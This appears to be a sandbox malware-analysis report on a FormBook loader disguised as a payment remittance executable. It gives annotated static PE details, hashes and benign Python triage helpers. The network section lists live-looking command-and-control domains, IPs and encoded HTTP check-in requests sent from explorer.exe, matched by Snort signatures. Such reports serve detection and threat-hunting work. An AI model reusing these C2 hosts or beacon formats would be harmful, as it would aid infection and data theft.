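    documented on the report page; they are passed through unchanged.
    """
    records = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 3:
            continue
        kind, name, *rest = row
        records.append({"kind": int(kind), "name": name, "extra": rest[:-1], "flag": int(rest[-1])})
    return records


def bound_assemblies(records: list) -> dict:
    """Map simple assembly name -> version, public key token, NGEN image path."""
    out = {}
    for rec in records:
        if "Version=" not in rec["name"]:
            continue  # "fusion"/"WinRT" rows are loader settings, not assemblies (assumption)
        simple, *attrs = [p.strip() for p in rec["name"].split(",")]
        attr = dict(a.split("=", 1) for a in attrs)
        out[simple] = {
            "version": attr.get("Version"),
            "token": attr.get("PublicKeyToken"),
            "ni_path": rec["extra"][0] if rec["extra"] else None,
        }
    return out


def gui_assemblies_loaded(assemblies: dict) -> set:
    """GUI assemblies bound by a binary whose version info calls it a console app."""
    return GUI_ASSEMBLIES & set(assemblies)


if __name__ == "__main__":
    asm = bound_assemblies(parse_usage_log(SAMPLE_LOG))
    for name, info in asm.items():
        ngen = "yes" if info["ni_path"] else "no"
        print(f"{name:22} {info['version']:8} {info['token']}  ngen={ngen}")
    print("GUI assemblies:", sorted(gui_assemblies_loaded(asm)))
```

Run against the real file from a triage VM the output is the same table; the point of `gui_assemblies_loaded` is that System.Windows.Forms and System.Drawing bound by a "Console Kia" binary is one more sign that the version resource is filler.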

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.463479204604476
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            File size:509952
                                                            MD5:e29285288905ebb27d9e4443bcaa6638
                                                            SHA1:3c656f9257b7630e47f57d1326bceafb7481ab29
                                                            SHA256:7027a232f8327a532a1b37586cd42ea73ea0b9c37b1b22334484888f0b13b6b6
                                                            SHA512:16fc6b4d5f0f258ac3887295843553e524276ce4fa127ce01cd49118b8765823885065daf3c2cab716529c6fbe97e2ea47233e88215852b528be6e68e801da1f
                                                            SSDEEP:12288:tqk4DbF53e0IUFLe8OsbVPIBNpvv5Cq9HS2W3wI7GJFY:Gy8dPOX5CSy2WW8
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#@a..............0.................. ........@.. ....................... ............@................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47daca
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x61402397 [Tue Sep 14 04:22:47 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            sub byte ptr [eax], al
                                                            sub al, 00h
                                                            sub dword ptr [eax], eax
                                                            add byte ptr [eax], al      (repeated 94 times: the remaining bytes are zero padding, and 00 00 decodes as this instruction)

                                                            This is the expected shape for a .NET executable. The native entry point is a single jmp through the IAT slot at 0x402000 (ImageBase 0x400000 + IAT RVA 0x2000) to mscoree.dll!_CorExeMain, the only import. Nothing after that six-byte stub is code; the program logic is CIL reached through the CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008), so a native disassembly of the entry point says nothing about what the loader does.

                                                            Data Directories

                                                            Name                                    Virtual Address   Virtual Size   Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT            0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT            0x7da78           0x4f           .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE          0x7e000           0x62c          .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION         0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY          0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC         0x80000           0xc            .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG             0x7d940           0x1c           .text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT         0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR         0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS               0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG       0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT      0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT               0x2000            0x8            .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT      0x0               0x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR    0x2008            0x48           .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED          0x0               0x0

                                                            Sections

                                                            Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy          Characteristics
                                                            .text    0x2000            0x7bad8        0x7bc00    False      0.845947758838    data        7.48050578829    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc    0x7e000           0x62c          0x800      False      0.34912109375     data        3.50217220911    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc   0x80000           0xc            0x200      False      0.044921875       data        0.101910425663   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            Name          RVA       Size    Type                                                                              Language   Country
                                                            RT_VERSION    0x7e090   0x39c   data
                                                            RT_MANIFEST   0x7e43c   0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                            Imports

                                                            DLL           Import
                                                            mscoree.dll   _CorExeMain

                                                            Version Infos

                                                            Description        Data
                                                            Translation        0x0000 0x04b0
                                                            LegalCopyright     1992 Donkervoort S8
                                                            Assembly Version   8.0.2.0
                                                            InternalName       SerializationHeaderReco.exe
                                                            FileVersion        8.0.0.0
                                                            CompanyName        Cuppy's Coffee
                                                            LegalTrademarks
                                                            Comments           2005 Kia Spectra
                                                            ProductName        Console Kia
                                                            ProductVersion     8.0.0.0
                                                            FileDescription    Console Kia
                                                            OriginalFilename   SerializationHeaderReco.exe

                                                            The version resource is filler (a car model, a coffee chain, a 1992 copyright on a .NET 4 binary with a September 2021 timestamp), and OriginalFilename/InternalName do not match the submitted name. Treat these strings as crypter output rather than attribution; they remain usable as a pivot to sibling builds that share them.
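The static values in this section can be cross-checked without the sandbox. The following is an added example (not code from the report or from Joe Sandbox) that re-derives four of them: it decodes a six-byte `FF 25` entry stub and checks that it jumps through the single IAT slot to the mscoree import, renders the PE timestamp the way the report prints it, computes Shannon entropy with the usual "above 7 bits per byte is packed or encrypted" heuristic, and decodes DllCharacteristics bits. The entry-stub bytes and the section contents are constructed here to match the reported values, and the raw DllCharacteristics value 0x8540 is assumed from the four listed flags.

```python
"""Static triage checks that re-derive values from the Static PE Info above.

Added example; not code from the report or from Joe Sandbox. The entry-stub
bytes and the section contents are constructed to match the reported values,
and the DllCharacteristics raw value is assumed from the listed flags.
"""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGE_BASE = 0x400000               # Imagebase (report)
IAT_RVA, IAT_SIZE = 0x2000, 0x8     # IMAGE_DIRECTORY_ENTRY_IAT (report)
PE_TIMESTAMP = 0x61402397           # Time Stamp (report)
DLL_CHARACTERISTICS_RAW = 0x8540    # assumed: the value that yields the four listed flags

# Constructed: the entry point as the report disassembles it. FF 25 imm32 is
# "jmp dword ptr [imm32]"; the zero padding decodes as "add byte ptr [eax], al".
ENTRY_BYTES = bytes.fromhex("ff25 0020 4000") + b"\x00" * 16

# Constructed stand-ins for section contents: .text-like high-entropy bytes
# (the reported 7.48 bits/byte) and a .reloc-like block that is nearly all zero.
TEXT_LIKE = random.Random(1).randbytes(0x7BC00)
RELOC_LIKE = bytes.fromhex("00200800 0c000000 c03d0000") + b"\x00" * (0x200 - 12)

# winnt.h IMAGE_DLLCHARACTERISTICS_* bits
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def decode_entry_stub(code: bytes) -> dict:
    """Decode a `jmp dword ptr [imm32]` stub and test where it points.

    A .NET executable's native entry point should jump through its only IAT
    slot to mscoree!_CorExeMain; anything else means native code runs first.
    """
    if code[:2] != b"\xff\x25":
        raise ValueError("entry point is not a jmp dword ptr [imm32] stub")
    target_va = struct.unpack_from("<I", code, 2)[0]
    target_rva = target_va - IMAGE_BASE
    return {
        "target_va": target_va,
        "jumps_through_iat": IAT_RVA <= target_rva < IAT_RVA + IAT_SIZE,
        "padding_is_zero": not any(code[6:]),
    }


def pe_timestamp(ts: int) -> str:
    """Render IMAGE_FILE_HEADER.TimeDateStamp the way the report prints it."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def likely_packed(entropy: float, threshold: float = 7.0) -> bool:
    """Common heuristic: a code section above ~7 bits/byte is compressed or encrypted."""
    return entropy > threshold


def decode_dll_characteristics(value: int) -> list:
    """Names of the set IMAGE_DLLCHARACTERISTICS bits, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def triage_summary() -> dict:
    """Run every check against the constructed inputs and return the results."""
    text_entropy = shannon_entropy(TEXT_LIKE)
    return {
        "entry_stub": decode_entry_stub(ENTRY_BYTES),
        "timestamp": pe_timestamp(PE_TIMESTAMP),
        "text_entropy": text_entropy,
        "text_likely_packed": likely_packed(text_entropy),
        "reloc_likely_packed": likely_packed(shannon_entropy(RELOC_LIKE)),
        "dll_characteristics": decode_dll_characteristics(DLL_CHARACTERISTICS_RAW),
    }


if __name__ == "__main__":
    for key, value in triage_summary().items():
        print(f"{key}: {value}")
```

On a real file the same functions take the bytes at the entry point and the section data read from disk; the constants at the top are the only values tied to this sample. An entry stub that does not jump into the IAT, or a .text section whose entropy sits near 7.5 as it does here, is exactly the pair of signals that justifies running the sample rather than trusting its version resource.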

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp                  Protocol   SID       Message                                         Source Port   Dest Port   Source IP     Dest IP
                                                            09/15/21-08:17:15.112241   TCP        2031453   ET TROJAN FormBook CnC Checkin (GET)            49784         80          192.168.2.3   198.54.117.211
                                                            09/15/21-08:17:15.112241   TCP        2031449   ET TROJAN FormBook CnC Checkin (GET)            49784         80          192.168.2.3   198.54.117.211
                                                            09/15/21-08:17:15.112241   TCP        2031412   ET TROJAN FormBook CnC Checkin (GET)            49784         80          192.168.2.3   198.54.117.211
                                                            09/15/21-08:17:27.003769   ICMP       402       ICMP Destination Unreachable Port Unreachable                             192.168.2.3   8.8.8.8
                                                            09/15/21-08:17:36.721776   ICMP       402       ICMP Destination Unreachable Port Unreachable                             192.168.2.3   8.8.8.8
                                                            09/15/21-08:17:37.722537   ICMP       402       ICMP Destination Unreachable Port Unreachable                             192.168.2.3   8.8.8.8

                                                            All three FormBook check-in signatures fire on the same outbound packet (49784 to 198.54.117.211:80 at 08:17:15.112241, listed in the TCP packet table); the earlier connections to 198.54.117.215 and 52.71.133.130 raised no alert.

                                                            TCP Packets

                                                            Timestamp                              Source Port   Dest Port   Source IP        Dest IP
                                                            Sep 15, 2021 08:16:58.582576036 CEST   49778         80          192.168.2.3      198.54.117.215
                                                            Sep 15, 2021 08:16:58.763209105 CEST   80            49778       198.54.117.215   192.168.2.3
                                                            Sep 15, 2021 08:16:58.763370991 CEST   49778         80          192.168.2.3      198.54.117.215
                                                            Sep 15, 2021 08:16:58.763638973 CEST   49778         80          192.168.2.3      198.54.117.215
                                                            Sep 15, 2021 08:16:58.946127892 CEST   80            49778       198.54.117.215   192.168.2.3
                                                            Sep 15, 2021 08:16:58.946165085 CEST   80            49778       198.54.117.215   192.168.2.3
                                                            Sep 15, 2021 08:17:04.010411978 CEST   49779         80          192.168.2.3      52.71.133.130
                                                            Sep 15, 2021 08:17:04.150010109 CEST   80            49779       52.71.133.130    192.168.2.3
                                                            Sep 15, 2021 08:17:04.150124073 CEST   49779         80          192.168.2.3      52.71.133.130
                                                            Sep 15, 2021 08:17:04.150310040 CEST   49779         80          192.168.2.3      52.71.133.130
                                                            Sep 15, 2021 08:17:04.289341927 CEST   80            49779       52.71.133.130    192.168.2.3
                                                            Sep 15, 2021 08:17:04.289372921 CEST   80            49779       52.71.133.130    192.168.2.3
                                                            Sep 15, 2021 08:17:04.289396048 CEST   80            49779       52.71.133.130    192.168.2.3
                                                            Sep 15, 2021 08:17:04.289764881 CEST   49779         80          192.168.2.3      52.71.133.130
                                                            Sep 15, 2021 08:17:04.289892912 CEST   49779         80          192.168.2.3      52.71.133.130
                                                            Sep 15, 2021 08:17:04.429339886 CEST   80            49779       52.71.133.130    192.168.2.3
                                                            Sep 15, 2021 08:17:14.939905882 CEST   49784         80          192.168.2.3      198.54.117.211
                                                            Sep 15, 2021 08:17:15.111032963 CEST   80            49784       198.54.117.211   192.168.2.3
                                                            Sep 15, 2021 08:17:15.111490011 CEST   49784         80          192.168.2.3      198.54.117.211
                                                            Sep 15, 2021 08:17:15.112241030 CEST   49784         80          192.168.2.3      198.54.117.211
                                                            Sep 15, 2021 08:17:15.283358097 CEST   80            49784       198.54.117.211   192.168.2.3
                                                            Sep 15, 2021 08:17:15.283459902 CEST8049784198.54.117.211192.168.2.3
                                                            Sep 15, 2021 08:17:26.724200010 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.001388073 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.001625061 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.278853893 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.279082060 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.517899036 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.554934978 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555051088 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555083036 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.555226088 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.555257082 CEST4978580192.168.2.3103.15.104.66
                                                            Sep 15, 2021 08:17:27.793827057 CEST8049785103.15.104.66192.168.2.3
                                                            Sep 15, 2021 08:17:27.793940067 CEST4978580192.168.2.3103.15.104.66

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 08:15:30.576337099 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:15:30.614059925 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:15:54.767194033 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:15:54.802340984 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:16:02.618539095 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:16:02.661425114 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:16:02.959789038 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:16:02.991704941 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:16:26.359940052 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:16:26.405379057 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:16:39.199558973 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:16:39.234639883 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:16:58.536778927 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:16:58.576446056 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:03.958511114 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:04.009198904 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:09.819931030 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:09.867863894 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:12.239017010 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:12.285737991 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:13.669127941 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:13.696032047 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:14.904324055 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:14.937865019 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:25.341937065 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:26.330404043 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:26.722035885 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:27.003680944 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:32.567346096 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:33.596535921 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:34.596653938 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:35.691082954 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:36.721256018 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:37.722446918 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:40.708005905 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:40.861347914 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 08:17:46.537237883 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 08:17:46.814873934 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Sep 15, 2021 08:17:27.003768921 CEST | 192.168.2.3 | 8.8.8.8 | d056 | (Port unreachable) | Destination Unreachable
Sep 15, 2021 08:17:36.721776009 CEST | 192.168.2.3 | 8.8.8.8 | cff1 | (Port unreachable) | Destination Unreachable
Sep 15, 2021 08:17:37.722537041 CEST | 192.168.2.3 | 8.8.8.8 | cff1 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 08:16:58.536778927 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b46 | Standard query (0) | www.yummyblockparty.com | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:03.958511114 CEST | 192.168.2.3 | 8.8.8.8 | 0xb05b | Standard query (0) | www.johnharrisagent.com | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:09.819931030 CEST | 192.168.2.3 | 8.8.8.8 | 0x6145 | Standard query (0) | www.fitotec.net | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.904324055 CEST | 192.168.2.3 | 8.8.8.8 | 0xdd0e | Standard query (0) | www.itsready.support | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:25.341937065 CEST | 192.168.2.3 | 8.8.8.8 | 0x3b69 | Standard query (0) | www.btt5204.com | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:26.330404043 CEST | 192.168.2.3 | 8.8.8.8 | 0x3b69 | Standard query (0) | www.btt5204.com | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:32.567346096 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a90 | Standard query (0) | www.hide.osaka | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:33.596535921 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a90 | Standard query (0) | www.hide.osaka | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:34.596653938 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a90 | Standard query (0) | www.hide.osaka | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:40.708005905 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a8f | Standard query (0) | www.pasalsacongress.com | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:46.537237883 CEST | 192.168.2.3 | 8.8.8.8 | 0x6f7d | Standard query (0) | www.moominmamalog.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | www.yummyblockparty.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:16:58.576446056 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b46 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:04.009198904 CEST | 8.8.8.8 | 192.168.2.3 | 0xb05b | No error (0) | www.johnharrisagent.com | | 52.71.133.130 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:09.867863894 CEST | 8.8.8.8 | 192.168.2.3 | 0x6145 | Name error (3) | www.fitotec.net | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | www.itsready.support | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:14.937865019 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd0e | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:26.722035885 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | www.btt5204.com | a3m1.cnamek.com | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:26.722035885 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | a3m1.cnamek.com | izgr3bagus.cdnddd.net | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:26.722035885 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | izgr3bagus.cdnddd.net | v3lala99.cdnddd.net | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:26.722035885 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | v3lala99.cdnddd.net | | 103.15.104.66 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:27.003680944 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | www.btt5204.com | a3m1.cnamek.com | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:27.003680944 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | a3m1.cnamek.com | izgr3bagus.cdnddd.net | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:27.003680944 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | izgr3bagus.cdnddd.net | v3lala99.cdnddd.net | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:27.003680944 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b69 | No error (0) | v3lala99.cdnddd.net | | 103.15.104.66 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:35.691082954 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a90 | Server failure (2) | www.hide.osaka | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:36.721256018 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a90 | Server failure (2) | www.hide.osaka | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:37.722446918 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a90 | Server failure (2) | www.hide.osaka | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:40.861347914 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a8f | No error (0) | www.pasalsacongress.com | pasalsacongress.com | | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 08:17:40.861347914 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a8f | No error (0) | pasalsacongress.com | | 192.185.52.175 | A (IP address) | IN (0x0001)
Sep 15, 2021 08:17:46.814873934 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f7d | No error (0) | www.moominmamalog.com | | 183.181.96.104 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.yummyblockparty.com
• www.johnharrisagent.com
• www.itsready.support
• www.btt5204.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49778 | 198.54.117.215 | 80 | C:\Windows\explorer.exe

Timestamp: Sep 15, 2021 08:16:58.763638973 CEST | kBytes transferred: 5871 | Direction: OUT
GET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1
Host: www.yummyblockparty.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49779 | 52.71.133.130 | 80 | C:\Windows\explorer.exe

Timestamp: Sep 15, 2021 08:17:04.150310040 CEST | kBytes transferred: 5872 | Direction: OUT
GET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1
Host: www.johnharrisagent.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

